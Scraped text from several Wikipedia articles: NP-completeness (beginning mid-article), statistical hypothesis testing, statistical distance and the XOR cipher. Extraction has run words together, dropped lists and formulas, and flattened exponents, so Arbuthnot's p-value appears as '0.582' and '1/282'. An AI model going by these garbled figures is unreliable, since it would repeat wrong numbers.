isomorphism problem, thegraph theoryproblem of determining whether agraph isomorphismexists between two graphs. Two graphs areisomorphicif one can betransformedinto the other simply by renamingvertices. Consider these two problems: The Subgraph Isomorphism problem is NP-complete. The graph isomorphism problem is suspected to be neither in P nor NP-complete, though it is in NP. This is an example of a problem that is thought to behard, but is not thought to be NP-complete. This class is calledNP-Intermediate problemsand exists if and only if P≠NP. At present, all known algorithms for NP-complete problems require time that issuperpolynomialin the input size. Thevertex coverproblem hasO(1.2738k+nk){\displaystyle O(1.2738^{k}+nk)}[6]for somek>0{\displaystyle k>0}and it is unknown whether there are any faster algorithms. The following techniques can be applied to solve computational problems in general, and they often give rise to substantially faster algorithms: One example of a heuristic algorithm is a suboptimalO(nlog⁡n){\displaystyle O(n\log n)}greedy coloring algorithmused forgraph coloringduring theregister allocationphase of some compilers, a technique calledgraph-coloring global register allocation. Each vertex is a variable, edges are drawn between variables which are being used at the same time, and colors indicate the register assigned to each variable. Because mostRISCmachines have a fairly large number of general-purpose registers, even a heuristic approach is effective for this application. In the definition of NP-complete given above, the termreductionwas used in the technical meaning of a polynomial-timemany-one reduction. Another type of reduction is polynomial-timeTuring reduction. A problemX{\displaystyle \scriptstyle X}is polynomial-time Turing-reducible to a problemY{\displaystyle \scriptstyle Y}if, given a subroutine that solvesY{\displaystyle \scriptstyle Y}in polynomial time, one could write a program that calls this subroutine and solvesX{\displaystyle \scriptstyle X}in polynomial time. This contrasts with many-one reducibility, which has the restriction that the program can only call the subroutine once, and the return value of the subroutine must be the return value of the program. If one defines the analogue to NP-complete with Turing reductions instead of many-one reductions, the resulting set of problems won't be smaller than NP-complete; it is an open question whether it will be any larger. Another type of reduction that is also often used to define NP-completeness is thelogarithmic-space many-one reductionwhich is a many-one reduction that can be computed with only a logarithmic amount of space. Since every computation that can be done inlogarithmic spacecan also be done in polynomial time it follows that if there is a logarithmic-space many-one reduction then there is also a polynomial-time many-one reduction. This type of reduction is more refined than the more usual polynomial-time many-one reductions and it allows us to distinguish more classes such asP-complete. Whether under these types of reductions the definition of NP-complete changes is still an open problem. All currently known NP-complete problems are NP-complete under log space reductions. All currently known NP-complete problems remain NP-complete even under much weaker reductions such asAC0{\displaystyle AC_{0}}reductions andNC0{\displaystyle NC_{0}}reductions. Some NP-Complete problems such as SAT are known to be complete even under polylogarithmic time projections.[7]It is known, however, thatAC0reductions define a strictly smaller class than polynomial-time reductions.[8] According toDonald Knuth, the name "NP-complete" was popularized byAlfred Aho,John HopcroftandJeffrey Ullmanin their celebrated textbook "The Design and Analysis of Computer Algorithms". He reports that they introduced the change in thegalley proofsfor the book (from "polynomially-complete"), in accordance with the results of a poll he had conducted of thetheoretical computer sciencecommunity.[9]Other suggestions made in the poll[10]included "Herculean", "formidable",Steiglitz's "hard-boiled" in honor of Cook, and Shen Lin's acronym "PET", which stood for "probably exponential time", but depending on which way theP versus NP problemwent, could stand for "provably exponential time" or "previously exponential time".[11] The following misconceptions are frequent.[12] Viewing adecision problemas a formal language in some fixed encoding, the set NPC of all NP-complete problems isnot closedunder: It is not known whether NPC is closed undercomplementation, since NPC=co-NPCif and only if NP=co-NP, and since NP=co-NP is anopen question.[16]
https://en.wikipedia.org/wiki/NP-completeness
Astatistical hypothesis testis a method of statistical inference used to decide whether the data provide sufficient evidence to reject a particular hypothesis. A statistical hypothesis test typically involves a calculation of atest statistic. Then a decision is made, either by comparing the test statistic to acritical valueor equivalently by evaluating ap-valuecomputed from the test statistic. Roughly 100specialized statistical testsare in use and noteworthy.[1][2] While hypothesis testing was popularized early in the 20th century, early forms were used in the 1700s. The first use is credited toJohn Arbuthnot(1710),[3]followed byPierre-Simon Laplace(1770s), in analyzing thehuman sex ratioat birth; see§ Human sex ratio. Paul Meehlhas argued that theepistemologicalimportance of the choice of null hypothesis has gone largely unacknowledged. When the null hypothesis is predicted by theory, a more precise experiment will be a more severe test of the underlying theory. When the null hypothesis defaults to "no difference" or "no effect", a more precise experiment is a less severe test of the theory that motivated performing the experiment.[4]An examination of the origins of the latter practice may therefore be useful: 1778:Pierre Laplacecompares the birthrates of boys and girls in multiple European cities. He states: "it is natural to conclude that these possibilities are very nearly in the same ratio". Thus, the null hypothesis in this case that the birthrates of boys and girls should be equal given "conventional wisdom".[5] 1900:Karl Pearsondevelops thechi squared testto determine "whether a given form of frequency curve will effectively describe the samples drawn from a given population." Thus the null hypothesis is that a population is described by some distribution predicted by theory. He uses as an example the numbers of five and sixes in theWeldon dice throw data.[6] 1904:Karl Pearsondevelops the concept of "contingency" in order to determine whether outcomes areindependentof a given categorical factor. Here the null hypothesis is by default that two things are unrelated (e.g. scar formation and death rates from smallpox).[7]The null hypothesis in this case is no longer predicted by theory or conventional wisdom, but is instead theprinciple of indifferencethat ledFisherand others to dismiss the use of "inverse probabilities".[8] Modern significance testing is largely the product ofKarl Pearson(p-value,Pearson's chi-squared test),William Sealy Gosset(Student's t-distribution), andRonald Fisher("null hypothesis",analysis of variance, "significance test"), while hypothesis testing was developed byJerzy NeymanandEgon Pearson(son of Karl). Ronald Fisher began his life in statistics as a Bayesian (Zabell 1992), but Fisher soon grew disenchanted with the subjectivity involved (namely use of theprinciple of indifferencewhen determining prior probabilities), and sought to provide a more "objective" approach to inductive inference.[9] Fisher emphasized rigorous experimental design and methods to extract a result from few samples assumingGaussian distributions. Neyman (who teamed with the younger Pearson) emphasized mathematical rigor and methods to obtain more results from many samples and a wider range of distributions. Modern hypothesis testing is an inconsistent hybrid of the Fisher vs Neyman/Pearson formulation, methods and terminology developed in the early 20th century. Fisher popularized the "significance test". He required a null-hypothesis (corresponding to a population frequency distribution) and a sample. His (now familiar) calculations determined whether to reject the null-hypothesis or not. Significance testing did not utilize an alternative hypothesis so there was no concept of aType II error(false negative). Thep-value was devised as an informal, but objective, index meant to help a researcher determine (based on other knowledge) whether to modify future experiments or strengthen one'sfaithin the null hypothesis.[10]Hypothesis testing (and Type I/II errors) was devised by Neyman and Pearson as a more objective alternative to Fisher'sp-value, also meant to determine researcher behaviour, but without requiring anyinductive inferenceby the researcher.[11][12] Neyman & Pearson considered a different problem to Fisher (which they called "hypothesis testing"). They initially considered two simple hypotheses (both with frequency distributions). They calculated two probabilities and typically selected the hypothesis associated with the higher probability (the hypothesis more likely to have generated the sample). Their method always selected a hypothesis. It also allowed the calculation of both types of error probabilities. Fisher and Neyman/Pearson clashed bitterly. Neyman/Pearson considered their formulation to be an improved generalization of significance testing (the defining paper[11]wasabstract; Mathematicians have generalized and refined the theory for decades[13]). Fisher thought that it was not applicable to scientific research because often, during the course of the experiment, it is discovered that the initial assumptions about the null hypothesis are questionable due to unexpected sources of error. He believed that the use of rigid reject/accept decisions based on models formulated before data is collected was incompatible with this common scenario faced by scientists and attempts to apply this method to scientific research would lead to mass confusion.[14] The dispute between Fisher and Neyman–Pearson was waged on philosophical grounds, characterized by a philosopher as a dispute over the proper role of models in statistical inference.[15] Events intervened: Neyman accepted a position in theUniversity of California, Berkeleyin 1938, breaking his partnership with Pearson and separating the disputants (who had occupied the same building).World War IIprovided an intermission in the debate. The dispute between Fisher and Neyman terminated (unresolved after 27 years) with Fisher's death in 1962. Neyman wrote a well-regarded eulogy.[16]Some of Neyman's later publications reportedp-values and significance levels.[17] The modern version of hypothesis testing is generally called thenull hypothesis significance testing (NHST)[18]and is a hybrid of the Fisher approach with the Neyman-Pearson approach. In 2000,Raymond S. Nickersonwrote an article stating that NHST was (at the time) "arguably the most widely used method of analysis of data collected in psychological experiments and has been so for about 70 years" and that it was at the same time "very controversial".[18] This fusion resulted from confusion by writers of statistical textbooks (as predicted by Fisher) beginning in the 1940s[19](butsignal detection, for example, still uses the Neyman/Pearson formulation). Great conceptual differences and many caveats in addition to those mentioned above were ignored. Neyman and Pearson provided the stronger terminology, the more rigorous mathematics and the more consistent philosophy, but the subject taught today in introductory statistics has more similarities with Fisher's method than theirs.[20] Sometime around 1940,[19]authors of statistical text books began combining the two approaches by using thep-value in place of thetest statistic(or data) to test against the Neyman–Pearson "significance level". Hypothesis testing and philosophy intersect.Inferential statistics, which includes hypothesis testing, is applied probability. Both probability and its application are intertwined with philosophy. PhilosopherDavid Humewrote, "All knowledge degenerates into probability." Competing practical definitions ofprobabilityreflect philosophical differences. The most common application of hypothesis testing is in the scientific interpretation of experimental data, which is naturally studied by thephilosophy of science. Fisher and Neyman opposed the subjectivity of probability. Their views contributed to the objective definitions. The core of their historical disagreement was philosophical. Many of the philosophical criticisms of hypothesis testing are discussed by statisticians in other contexts, particularlycorrelation does not imply causationand thedesign of experiments. Hypothesis testing is of continuing interest to philosophers.[15][21] Statistics is increasingly being taught in schools with hypothesis testing being one of the elements taught.[22][23]Many conclusions reported in the popular press (political opinion polls to medical studies) are based on statistics. Some writers have stated that statistical analysis of this kind allows for thinking clearly about problems involving mass data, as well as the effective reporting of trends and inferences from said data, but caution that writers for a broad public should have a solid understanding of the field in order to use the terms and concepts correctly.[24][25]An introductory college statistics class places much emphasis on hypothesis testing – perhaps half of the course. Such fields as literature and divinity now include findings based on statistical analysis (see theBible Analyzer). An introductory statistics class teaches hypothesis testing as a cookbook process. Hypothesis testing is also taught at the postgraduate level. Statisticians learn how to create good statistical test procedures (likez, Student'st,Fand chi-squared). Statistical hypothesis testing is considered a mature area within statistics,[26]but a limited amount of development continues. An academic study states that the cookbook method of teaching introductory statistics leaves no time for history, philosophy or controversy. Hypothesis testing has been taught as received unified method. Surveys showed that graduates of the class were filled with philosophical misconceptions (on all aspects of statistical inference) that persisted among instructors.[27]While the problem was addressed more than a decade ago,[28]and calls for educational reform continue,[29]students still graduate from statistics classes holding fundamental misconceptions about hypothesis testing.[30]Ideas for improving the teaching of hypothesis testing include encouraging students to search for statistical errors in published papers, teaching the history of statistics and emphasizing the controversy in a generally dry subject.[31] Raymond S. Nickerson commented: The debate about NHST has its roots in unresolved disagreements among major contributors to the development of theories of inferential statistics on which modern approaches are based.Gigerenzeret al. (1989) have reviewed in considerable detail the controversy between R. A. Fisher on the one hand and Jerzy Neyman and Egon Pearson on the other as well as the disagreements between both of these views and those of the followers of Thomas Bayes. They noted the remarkable fact that little hint of the historical and ongoing controversy is to be found in most textbooks that are used to teach NHST to its potential users. The resulting lack of an accurate historical perspective and understanding of the complexity and sometimes controversial philosophical foundations of various approaches to statistical inference may go a long way toward explaining the apparent ease with which statistical tests are misused and misinterpreted.[18] The typical steps involved in performing a frequentist hypothesis test in practice are: The difference in the two processes applied to the radioactive suitcase example (below): The former report is adequate, the latter gives a more detailed explanation of the data and the reason why the suitcase is being checked. Not rejecting the null hypothesis does not mean the null hypothesis is "accepted" per se (though Neyman and Pearson used that word in their original writings; see theInterpretationsection). The processes described here are perfectly adequate for computation. They seriously neglect thedesign of experimentsconsiderations.[33][34] It is particularly critical that appropriate sample sizes be estimated before conducting the experiment. The phrase "test of significance" was coined by statisticianRonald Fisher.[35] When the null hypothesis is true and statistical assumptions are met, the probability that the p-value will be less than or equal to the significance levelα{\displaystyle \alpha }is at mostα{\displaystyle \alpha }. This ensures that the hypothesis test maintains its specified false positive rate (provided that statistical assumptions are met).[36] Thep-value is the probability that a test statistic which is at least as extreme as the one obtained would occur under the null hypothesis. At a significance level of 0.05, a fair coin would be expected to (incorrectly) reject the null hypothesis (that it is fair) in 1 out of 20 tests on average. Thep-value does not provide the probability that either the null hypothesis or its opposite is correct (a common source of confusion).[37] If thep-value is less than the chosen significance threshold (equivalently, if the observed test statistic is in the critical region), then we say the null hypothesis is rejected at the chosen level of significance. If thep-value isnotless than the chosen significance threshold (equivalently, if the observed test statistic is outside the critical region), then the null hypothesis is not rejected at the chosen level of significance. In the "lady tasting tea" example (below), Fisher required the lady to properly categorize all of the cups of tea to justify the conclusion that the result was unlikely to result from chance. His test revealed that if the lady was effectively guessing at random (the null hypothesis), there was a 1.4% chance that the observed results (perfectly ordered tea) would occur. Statistics are helpful in analyzing most collections of data. This is equally true of hypothesis testing which can justify conclusions even when no scientific theory exists. In the Lady tasting tea example, it was "obvious" that no difference existed between (milk poured into tea) and (tea poured into milk). The data contradicted the "obvious". Real world applications of hypothesis testing include:[38] Statistical hypothesis testing plays an important role in the whole of statistics and instatistical inference. For example, Lehmann (1992) in a review of the fundamental paper by Neyman and Pearson (1933) says: "Nevertheless, despite their shortcomings, the new paradigm formulated in the 1933 paper, and the many developments carried out within its framework continue to play a central role in both the theory and practice of statistics and can be expected to do so in the foreseeable future". Significance testing has been the favored statistical tool in some experimental social sciences (over 90% of articles in theJournal of Applied Psychologyduring the early 1990s).[39]Other fields have favored the estimation of parameters (e.g.effect size). Significance testing is used as a substitute for the traditional comparison of predicted value and experimental result at the core of thescientific method. When theory is only capable of predicting the sign of a relationship, a directional (one-sided) hypothesis test can be configured so that only a statistically significant result supports theory. This form of theory appraisal is the most heavily criticized application of hypothesis testing. "If the government required statistical procedures to carry warning labels like those on drugs, most inference methods would have long labels indeed."[40]This caution applies to hypothesis tests and alternatives to them. The successful hypothesis test is associated with a probability and a type-I error rate. The conclusionmightbe wrong. The conclusion of the test is only as solid as the sample upon which it is based. The design of the experiment is critical. A number of unexpected effects have been observed including: A statistical analysis of misleading data produces misleading conclusions. The issue of data quality can be more subtle. Inforecastingfor example, there is no agreement on a measure of forecast accuracy. In the absence of a consensus measurement, no decision based on measurements will be without controversy. Publication bias: Statistically nonsignificant results may be less likely to be published, which can bias the literature. Multiple testing: When multiple true null hypothesis tests are conducted at once without adjustment, the overall probability of Type I error is higher than the nominal alpha level.[41] Those making critical decisions based on the results of a hypothesis test are prudent to look at the details rather than the conclusion alone. In the physical sciences most results are fully accepted only when independently confirmed. The general advice concerning statistics is, "Figures never lie, but liars figure" (anonymous). The following definitions are mainly based on the exposition in the book by Lehmann and Romano:[36] A statistical hypothesis test compares a test statistic (zortfor examples) to a threshold. The test statistic (the formula found in the table below) is based on optimality. For a fixed level of Type I error rate, use of these statistics minimizes Type II error rates (equivalent to maximizing power). The following terms describe tests in terms of such optimality: Bootstrap-basedresamplingmethods can be used for null hypothesis testing. A bootstrap creates numerous simulated samples by randomly resampling (with replacement) the original, combined sample data, assuming the null hypothesis is correct. The bootstrap is very versatile as it is distribution-free and it does not rely on restrictive parametric assumptions, but rather on empirical approximate methods with asymptotic guarantees. Traditional parametric hypothesis tests are more computationally efficient but make stronger structural assumptions. In situations where computing the probability of the test statistic under the null hypothesis is hard or impossible (due to perhaps inconvenience or lack of knowledge of the underlying distribution), the bootstrap offers a viable method for statistical inference.[43][44][45][46] The earliest use of statistical hypothesis testing is generally credited to the question of whether male and female births are equally likely (null hypothesis), which was addressed in the 1700s byJohn Arbuthnot(1710),[47]and later byPierre-Simon Laplace(1770s).[48] Arbuthnot examined birth records in London for each of the 82 years from 1629 to 1710, and applied thesign test, a simplenon-parametric test.[49][50][51]In every year, the number of males born in London exceeded the number of females. Considering more male or more female births as equally likely, the probability of the observed outcome is 0.582, or about 1 in 4,836,000,000,000,000,000,000,000; in modern terms, this is thep-value. Arbuthnot concluded that this is too small to be due to chance and must instead be due to divine providence: "From whence it follows, that it is Art, not Chance, that governs." In modern terms, he rejected the null hypothesis of equally likely male and female births at thep= 1/282significance level. Laplace considered the statistics of almost half a million births. The statistics showed an excess of boys compared to girls.[5]He concluded by calculation of ap-value that the excess was a real, but unexplained, effect.[52] In a famous example of hypothesis testing, known as theLady tasting tea,[53]Dr.Muriel Bristol, a colleague of Fisher, claimed to be able to tell whether the tea or the milk was added first to a cup. Fisher proposed to give her eight cups, four of each variety, in random order. One could then ask what the probability was for her getting the number she got correct, but just by chance. The null hypothesis was that the Lady had no such ability. The test statistic was a simple count of the number of successes in selecting the 4 cups. The critical region was the single case of 4 successes of 4 possible based on a conventional probability criterion (< 5%). A pattern of 4 successes corresponds to 1 out of 70 possible combinations (p≈ 1.4%). Fisher asserted that no alternative hypothesis was (ever) required. The lady correctly identified every cup,[54]which would be considered a statistically significant result. A statistical test procedure is comparable to a criminaltrial; a defendant is considered not guilty as long as his or her guilt is not proven. The prosecutor tries to prove the guilt of the defendant. Only when there is enough evidence for the prosecution is the defendant convicted. In the start of the procedure, there are two hypothesesH0{\displaystyle H_{0}}: "the defendant is not guilty", andH1{\displaystyle H_{1}}: "the defendant is guilty". The first one,H0{\displaystyle H_{0}}, is called thenull hypothesis. The second one,H1{\displaystyle H_{1}}, is called thealternative hypothesis. It is the alternative hypothesis that one hopes to support. The hypothesis of innocence is rejected only when an error is very unlikely, because one does not want to convict an innocent defendant. Such an error is callederror of the first kind(i.e., the conviction of an innocent person), and the occurrence of this error is controlled to be rare. As a consequence of this asymmetric behaviour, anerror of the second kind(acquitting a person who committed the crime), is more common. A criminal trial can be regarded as either or both of two decision processes: guilty vs not guilty or evidence vs a threshold ("beyond a reasonable doubt"). In one view, the defendant is judged; in the other view the performance of the prosecution (which bears the burden of proof) is judged. A hypothesis test can be regarded as either a judgment of a hypothesis or as a judgment of evidence. A person (the subject) is tested forclairvoyance. They are shown the back face of a randomly chosen playing card 25 times and asked which of the foursuitsit belongs to. The number of hits, or correct answers, is calledX. As we try to find evidence of their clairvoyance, for the time being the null hypothesis is that the person is not clairvoyant.[55]The alternative is: the person is (more or less) clairvoyant. If the null hypothesis is valid, the only thing the test person can do is guess. For every card, the probability (relative frequency) of any single suit appearing is 1/4. If the alternative is valid, the test subject will predict the suit correctly with probability greater than 1/4. We will call the probability of guessing correctlyp. The hypotheses, then, are: and When the test subject correctly predicts all 25 cards, we will consider them clairvoyant, and reject the null hypothesis. Thus also with 24 or 23 hits. With only 5 or 6 hits, on the other hand, there is no cause to consider them so. But what about 12 hits, or 17 hits? What is the critical number,c, of hits, at which point we consider the subject to be clairvoyant? How do we determine the critical valuec? With the choicec=25 (i.e. we only accept clairvoyance when all cards are predicted correctly) we're more critical than withc=10. In the first case almost no test subjects will be recognized to be clairvoyant, in the second case, a certain number will pass the test. In practice, one decides how critical one will be. That is, one decides how often one accepts an error of the first kind – afalse positive, or Type I error. Withc= 25 the probability of such an error is: and hence, very small. The probability of a false positive is the probability of randomly guessing correctly all 25 times. Being less critical, withc= 10, gives: Thus,c= 10 yields a much greater probability of false positive. Before the test is actually performed, the maximum acceptable probability of a Type I error (α) is determined. Typically, values in the range of 1% to 5% are selected. (If the maximum acceptable error rate is zero, an infinite number of correct guesses is required.) Depending on this Type 1 error rate, the critical valuecis calculated. For example, if we select an error rate of 1%,cis calculated thus: From all the numbers c, with this property, we choose the smallest, in order to minimize the probability of a Type II error, afalse negative. For the above example, we select:c=13{\displaystyle c=13}. Statistical hypothesis testing is a key technique of bothfrequentist inferenceandBayesian inference, although the two types of inference have notable differences. Statistical hypothesis tests define a procedure that controls (fixes) the probability of incorrectlydecidingthat a default position (null hypothesis) is incorrect. The procedure is based on how likely it would be for a set of observations to occur if the null hypothesis were true. This probability of making an incorrect decision isnotthe probability that the null hypothesis is true, nor whether any specific alternative hypothesis is true. This contrasts with other possible techniques ofdecision theoryin which the null andalternative hypothesisare treated on a more equal basis. One naïveBayesianapproach to hypothesis testing is to base decisions on theposterior probability,[56][57]but this fails when comparing point and continuous hypotheses. Other approaches to decision making, such asBayesian decision theory, attempt to balance the consequences of incorrect decisions across all possibilities, rather than concentrating on a single null hypothesis. A number of other approaches to reaching a decision based on data are available viadecision theoryandoptimal decisions, some of which have desirable properties. Hypothesis testing, though, is a dominant approach to data analysis in many fields of science. Extensions to the theory of hypothesis testing include the study of thepowerof tests, i.e. the probability of correctly rejecting the null hypothesis given that it is false. Such considerations can be used for the purpose ofsample size determinationprior to the collection of data. An example of Neyman–Pearson hypothesis testing (or null hypothesis statistical significance testing) can be made by a change to the radioactive suitcase example. If the "suitcase" is actually a shielded container for the transportation of radioactive material, then a test might be used to select among three hypotheses: no radioactive source present, one present, two (all) present. The test could be required for safety, with actions required in each case. TheNeyman–Pearson lemmaof hypothesis testing says that a good criterion for the selection of hypotheses is the ratio of their probabilities (alikelihood ratio). A simple method of solution is to select the hypothesis with the highest probability for the Geiger counts observed. The typical result matches intuition: few counts imply no source, many counts imply two sources and intermediate counts imply one source. Notice also that usually there are problems forproving a negative. Null hypotheses should be at leastfalsifiable. Neyman–Pearson theory can accommodate both prior probabilities and the costs of actions resulting from decisions.[58]The former allows each test to consider the results of earlier tests (unlike Fisher's significance tests). The latter allows the consideration of economic issues (for example) as well as probabilities. A likelihood ratio remains a good criterion for selecting among hypotheses. The two forms of hypothesis testing are based on different problem formulations. The original test is analogous to a true/false question; the Neyman–Pearson test is more like multiple choice. In the view ofTukey[59]the former produces a conclusion on the basis of only strong evidence while the latter produces a decision on the basis of available evidence. While the two tests seem quite different both mathematically and philosophically, later developments lead to the opposite claim. Consider many tiny radioactive sources. The hypotheses become 0,1,2,3... grains of radioactive sand. There is little distinction between none or some radiation (Fisher) and 0 grains of radioactive sand versus all of the alternatives (Neyman–Pearson). The major Neyman–Pearson paper of 1933[11]also considered composite hypotheses (ones whose distribution includes an unknown parameter). An example proved the optimality of the (Student's)t-test, "there can be no better test for the hypothesis under consideration" (p 321). Neyman–Pearson theory was proving the optimality of Fisherian methods from its inception. Fisher's significance testing has proven a popular flexible statistical tool in application with little mathematical growth potential. Neyman–Pearson hypothesis testing is claimed as a pillar of mathematical statistics,[60]creating a new paradigm for the field. It also stimulated new applications instatistical process control,detection theory,decision theoryandgame theory. Both formulations have been successful, but the successes have been of a different character. The dispute over formulations is unresolved. Science primarily uses Fisher's (slightly modified) formulation as taught in introductory statistics. Statisticians study Neyman–Pearson theory in graduate school. Mathematicians are proud of uniting the formulations. Philosophers consider them separately. Learned opinions deem the formulations variously competitive (Fisher vs Neyman), incompatible[9]or complementary.[13]The dispute has become more complex since Bayesian inference has achieved respectability. The terminology is inconsistent. Hypothesis testing can mean any mixture of two formulations that both changed with time. Any discussion of significance testing vs hypothesis testing is doubly vulnerable to confusion. Fisher thought that hypothesis testing was a useful strategy for performing industrial quality control, however, he strongly disagreed that hypothesis testing could be useful for scientists.[10]Hypothesis testing provides a means of finding test statistics used in significance testing.[13]The concept of power is useful in explaining the consequences of adjusting the significance level and is heavily used insample size determination. The two methods remain philosophically distinct.[15]They usually (butnot always) produce the same mathematical answer. The preferred answer is context dependent.[13]While the existing merger of Fisher and Neyman–Pearson theories has been heavily criticized, modifying the merger to achieve Bayesian goals has been considered.[61] Criticism of statistical hypothesis testing fills volumes.[62][63][64][65][66][67]Much of the criticism can be summarized by the following issues: Critics and supporters are largely in factual agreement regarding the characteristics of null hypothesis significance testing (NHST): While it can provide critical information, it isinadequate as the sole tool for statistical analysis.Successfully rejecting the null hypothesis may offer no support for the research hypothesis.The continuing controversy concerns the selection of the best statistical practices for the near-term future given the existing practices. However, adequate research design can minimize this issue. Critics would prefer to ban NHST completely, forcing a complete departure from those practices,[78]while supporters suggest a less absolute change.[citation needed] Controversy over significance testing, and its effects on publication bias in particular, has produced several results. TheAmerican Psychological Associationhas strengthened its statistical reporting requirements after review,[79]medical journalpublishers have recognized the obligation to publish some results that are not statistically significant to combat publication bias,[80]and a journal (Journal of Articles in Support of the Null Hypothesis) has been created to publish such results exclusively.[81]Textbooks have added some cautions,[82]and increased coverage of the tools necessary to estimate the size of the sample required to produce significant results. Few major organizations have abandoned use of significance tests although some have discussed doing so.[79]For instance, in 2023, the editors of theJournal of Physiology"strongly recommend the use of estimation methods for those publishing in The Journal" (meaning the magnitude of theeffect size(to allow readers to judge whether a finding has practical, physiological, or clinical relevance) andconfidence intervalsto convey the precision of that estimate), saying "Ultimately, it is the physiological importance of the data that those publishing in The Journal of Physiology should be most concerned with, rather than the statistical significance."[83] A unifying position of critics is that statistics should not lead to an accept-reject conclusion or decision, but to an estimated value with aninterval estimate; this data-analysis philosophy is broadly referred to asestimation statistics. Estimation statistics can be accomplished with either frequentist[84]or Bayesian methods.[85][86] Critics of significance testing have advocated basing inference less on p-values and more on confidence intervals for effect sizes for importance, prediction intervals for confidence, replications and extensions for replicability, meta-analyses for generality :.[87]But none of these suggested alternatives inherently produces a decision. Lehmann said that hypothesis testing theory can be presented in terms of conclusions/decisions, probabilities, or confidence intervals: "The distinction between the ... approaches is largely one of reporting and interpretation."[26] Bayesian inferenceis one proposed alternative to significance testing. (Nickerson cited 10 sources suggesting it, including Rozeboom (1960)).[18]For example, Bayesianparameter estimationcan provide rich information about the data from which researchers can draw inferences, while using uncertainpriorsthat exert only minimal influence on the results when enough data is available. PsychologistJohn K. Kruschkehas suggested Bayesian estimation as an alternative for thet-test[85]and has also contrasted Bayesian estimation for assessing null values with Bayesian model comparison for hypothesis testing.[86]Two competing models/hypotheses can be compared usingBayes factors.[88]Bayesian methods could be criticized for requiring information that is seldom available in the cases where significance testing is most heavily used. Neither the prior probabilities nor theprobability distributionof the test statistic under the alternative hypothesis are often available in the social sciences.[18] Advocates of a Bayesian approach sometimes claim that the goal of a researcher is most often toobjectivelyassess theprobabilitythat ahypothesisis true based on the data they have collected.[89][90]NeitherFisher's significance testing, norNeyman–Pearsonhypothesis testing can provide this information, and do not claim to. The probability a hypothesis is true can only be derived from use ofBayes' Theorem, which was unsatisfactory to both the Fisher and Neyman–Pearson camps due to the explicit use ofsubjectivityin the form of theprior probability.[11][91]Fisher's strategy is to sidestep this with thep-value(an objectiveindexbased on the data alone) followed byinductive inference, while Neyman–Pearson devised their approach ofinductive behaviour.
https://en.wikipedia.org/wiki/Hypothesis_testing
Instatistics,probability theory, andinformation theory, astatistical distancequantifies thedistancebetween two statistical objects, which can be tworandom variables, or twoprobability distributionsorsamples, or the distance can be between an individual sample point and a population or a wider sample of points. A distance between populations can be interpreted as measuring the distance between twoprobability distributionsand hence they are essentially measures of distances betweenprobability measures. Where statistical distance measures relate to the differences betweenrandom variables, these may havestatistical dependence,[1]and hence these distances are not directly related to measures of distances between probability measures. Again, a measure of distance between random variables may relate to the extent of dependence between them, rather than to their individual values. Many statistical distance measures are notmetrics, and some are not symmetric. Some types of distance measures, which generalizesquareddistance, are referred to as (statistical)divergences. Many terms are used to refer to various notions of distance; these are often confusingly similar, and may be used inconsistently between authors and over time, either loosely or with precise technical meaning. In addition to "distance", similar terms includedeviance,deviation,discrepancy, discrimination, anddivergence, as well as others such ascontrast functionandmetric. Terms frominformation theoryincludecross entropy,relative entropy,discrimination information, andinformation gain. Ametricon a setXis afunction(called thedistance functionor simplydistance)d:X×X→R+(whereR+is the set of non-negativereal numbers). For allx,y,zinX, this function is required to satisfy the following conditions: Many statistical distances are notmetrics, because they lack one or more properties of proper metrics. For example,pseudometricsviolate property (2), identity of indiscernibles;quasimetricsviolate property (3), symmetry; andsemimetricsviolate property (4), the triangle inequality. Statistical distances that satisfy (1) and (2) are referred to asdivergences. Thetotal variation distanceof two distributionsX{\displaystyle X}andY{\displaystyle Y}over a finite domainD{\displaystyle D}, (often referred to asstatistical difference[2]orstatistical distance[3]in cryptography) is defined as Δ(X,Y)=12∑α∈D|Pr[X=α]−Pr[Y=α]|{\displaystyle \Delta (X,Y)={\frac {1}{2}}\sum _{\alpha \in D}|\Pr[X=\alpha ]-\Pr[Y=\alpha ]|}. We say that twoprobability ensembles{Xk}k∈N{\displaystyle \{X_{k}\}_{k\in \mathbb {N} }}and{Yk}k∈N{\displaystyle \{Y_{k}\}_{k\in \mathbb {N} }}are statistically close ifΔ(Xk,Yk){\displaystyle \Delta (X_{k},Y_{k})}is anegligible functionink{\displaystyle k}.
https://en.wikipedia.org/wiki/Statistical_distance
Incryptography, thesimple XOR cipheris a type ofadditivecipher,[1]anencryption algorithmthat operates according to the principles: For example where⊕{\displaystyle \oplus }denotes theexclusive disjunction(XOR) operation.[2]This operation is sometimes called modulus 2 addition (or subtraction, which is identical).[3]With this logic, a string of text can be encrypted by applying the bitwise XOR operator to every character using a given key. To decrypt the output, merely reapplying the XOR function with the key will remove the cipher. The string "Wiki" (01010111 01101001 01101011 01101001in 8-bitASCII) can be encrypted with the repeating key11110011as follows: And conversely, for decryption: The XOR operator is extremely common as a component in more complex ciphers. By itself, using a constant repeating key, a simple XOR cipher can trivially be broken usingfrequency analysis. If the content of any message can be guessed or otherwise known then the key can be revealed. Its primary merit is that it is simple to implement, and that the XOR operation is computationally inexpensive. A simple repeating XOR (i.e. using the same key for xor operation on the whole data) cipher is therefore sometimes used for hiding information in cases where no particular security is required. The XOR cipher is often used in computermalwareto make reverse engineering more difficult. If the key is random and is at least as long as the message, the XOR cipher is much more secure than when there is key repetition within a message.[4]When the keystream is generated by apseudo-random number generator, the result is astream cipher. With a key that istruly random, the result is aone-time pad, which isunbreakable in theory. The XOR operator in any of these ciphers is vulnerable to aknown-plaintext attack, sinceplaintext⊕{\displaystyle \oplus }ciphertext=key. It is also trivial to flip arbitrary bits in the decrypted plaintext by manipulating the ciphertext. This is calledmalleability. The primary reason XOR is so useful in cryptography is because it is "perfectly balanced"; for a given plaintext input 0 or 1, the ciphertext result is equally likely to be either 0 or 1 for a truly random key bit.[5] The table below shows all four possible pairs of plaintext and key bits. It is clear that if nothing is known about the key or plaintext, nothing can be determined from the ciphertext alone.[5] Other logical operations such andANDorORdo not have such a mapping (for example, AND would produce three 0's and one 1, so knowing that a given ciphertext bit is a 0 implies that there is a 2/3 chance that the original plaintext bit was a 0, as opposed to the ideal 1/2 chance in the case of XOR)[a] Example using thePythonprogramming language.[b] A shorter example using theRprogramming language, based on apuzzleposted on Instagram byGCHQ.
https://en.wikipedia.org/wiki/XOR_cipher
